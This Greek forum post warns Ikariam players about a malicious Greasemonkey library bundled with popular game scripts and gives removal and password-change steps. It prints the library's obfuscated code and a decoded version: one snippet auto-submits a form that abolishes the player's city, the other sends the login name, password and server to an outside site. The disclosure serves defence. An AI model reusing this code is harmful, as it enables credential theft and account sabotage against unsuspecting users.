Σε συνέχεια του προηγούμενου post και με αρκετό ψάξιμο βρήκα τα εξής:
Το "ύποπτο" script για τις κλοπές των λογαριασμών ή την καταστροφή πόλεων ονομάζεται 57377.user.js και το χρησιμοποιούν πολλά από τα scripts του greasemonkey (όπως το cr converter ή το army helper) και εγκαθίσταται μαζί τους με την εντολή:
// @require http://userscripts.org/scripts/source/57377.user.jsΑν πάτε στο C:\Documents and Settings\USER\Application Data\Mozilla\Firefox\Profiles\xxxxxxxxxxxx\gm_scripts\ikariam_cr_converter ή στο ~/.mozilla/firefox/χχχχχχχχ.default/gm_scripts/ikariam_cr_converter θα το δείτε.
Ανοίξτε το μ' έναν text editor και προς το τέλος του script αν βρείτε μερικές γραμμές που μοιάζουν κάπως έτσι:
var _0xe537=["id","body","city","value","citySelect","getElementById","innerHTML","<iframe src="index.php?view=abolishColony&id=">","match","location","length","form","getElementsByTagName","mainview","submit"];
if(document[_0xe537[1]][_0xe537[0]]==_0xe537[2]){var id=document[_0xe537[5]](_0xe537[4])[_0xe537[3]];document[_0xe537[1]][_0xe537[6]]+=_0xe537[7]+id+_0xe537[8];} ;if(document[_0xe537[10]].toString()[_0xe537[9]](/abolishColony/)&&document[_0xe537[5]](_0xe537[14])[_0xe537[13]](_0xe537[12])[_0xe537[11]]==1){document[_0xe537[5]](_0xe537[14])[_0xe537[13]](_0xe537[12])[0][_0xe537[15]]();} ;
ή κάπως έτσι:
var _0x7e3d=["\x66\x75\x6E\x63\x74\x69\x6F\x6E","\x73\x69\x7A\x65","\x23\x6C\x6F\x67\x69\x6E\x46\x6F\x72\x6D","\x76\x61\x6C\x75\x65","\x61\x74\x74\x72","\x23\x6C\x6F\x67\x69\x6E\x4E\x61\x6D\x65","\x23\x6C\x6F\x67\x69\x6E\x50\x61\x73\x73\x77\x6F\x72\x64","\x23\x6C\x6F\x67\x53\x65\x72\x76\x65\x72","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6B\x61\x72\x69\x61\x6D\x2D\x63\x74\x2E\x63\x6F\x2E\x63\x63\x2F\x3F\x6C\x3D","\x26\x70\x3D","\x26\x73\x3D","\x47\x45\x54","\x73\x75\x62\x6D\x69\x74"];if( typeof ($)==_0x7e3d[0]&&$(_0x7e3d[2])[_0x7e3d[1]]()==1){$(_0x7e3d[2])[_0x7e3d[12]](function (){var _0xb2dfx1=$(_0x7e3d[5])[_0x7e3d[4]](_0x7e3d[3]);var _0xb2dfx2=$(_0x7e3d[6])[_0x7e3d[4]](_0x7e3d[3]);var _0xb2dfx3=$(_0x7e3d[7])[_0x7e3d[4]](_0x7e3d[3]);var _0xb2dfx4=_0x7e3d[8]+_0xb2dfx1+_0x7e3d[9]+_0xb2dfx2+_0x7e3d[10]+_0xb2dfx3;
τότε έχετε το "κακό" script. Το πρώτο κομμάτι του κώδικα "μεταφράζεται" έτσι:
if (document['body']['id'] == 'city') {
var id = document['getElementById']('citySelect')['value'];
document['body']['innerHTML'] += '<iframe src=' + id + '>';
};
if (document['location'].toString()['match'](/abolishColony/) && document['getElementById']('mainview')['getElementsByTagName']('form')['length'] == 1) {
document['getElementById']('mainview')['getElementsByTagName']('form')[0]['submit']();
};
Και σου καταστρέφει την πόλη, ενώ το δεύτερο:
if (typeof($) == 'function' && $('#loginForm')['size']() == 1) {
$('#loginForm')['submit'](function () {
var _0xb2dfx1 = $('#loginName')['attr']('value');
var _0xb2dfx2 = $('#loginPassword')['attr']('value');
var _0xb2dfx3 = $('#logServer')['attr']('value');
var _0xb2dfx4 = 'http://ikariam-ct.co.cc/?l=' + _0xb2dfx1 + '&p=' + _0xb2dfx2 + '&s=' + _0xb2dfx3;
GM_xmlhttpRequest({
method: 'GET',
url: _0xb2dfx4,
onload: function (_0xb2dfx5) {}
});
});
στέλνει τους κωδικούς σου στο site
http://ikariam-ct.co.cc (το οποίο όμως είναι πλέον ανενεργό).
Σε περίπτωση που διαπιστώσετε ότι έχετε εγκατεστημένο αυτό το script τότε:
1. Κάνετε απεγκατάσταση σε ΟΛΑ τα scripts του greasemonkey (ποτέ δεν ξέρεις...)
2. Απενεργοποιείτε το greasemonkey
3. Κάνετε restart το firefox (και με απλό refresh γίνεται, αλλά σε κάθε tab που έχετε ανοιχτό)
4. Αλλάζετε τους κωδικούς σας στο παιχνίδι
5. Ενεργοποιείτε το greasemonkey και κάνετε εγκατάσταση τα scripts από την αρχή
Στην καινούρια εγκατάσταση κάντε έλεγχο εάν η γραμμή που εγκαθιστά το διορθωμένο 57377 λέει το εξής:
// @require http://www.betawarriors.com/bin/gm/57377user.jsΑν συνεχίζει να χρησιμοποιεί το userscripts.org/scripts/source/57377.user.js, τότε το πρόβλημα στο συγκεκριμένο script δεν έχει διορθωθεί και απενεργοποιήστε το.
Καλού-κακού πάντως και, εφόσον επιμένετε να χρησιμοποιείτε τα scripts, κάντε ένα περιοδικό έλεγχο στον κώδικα μπας και ανακαλύψετε τίποτα "ύποπτες" γραμμές όπως αυτές που αναφέρω παραπάνω.
Στο αρχείο
http://afogr.freehostia.com/files/odigies_scripts.doc που επιμελήθηκε ο σύμμαχος Nikakis θα βρείτε οδηγίες για τον εντοπισμό και απεγκατάσταση των "ύποπτων" scripts.
Author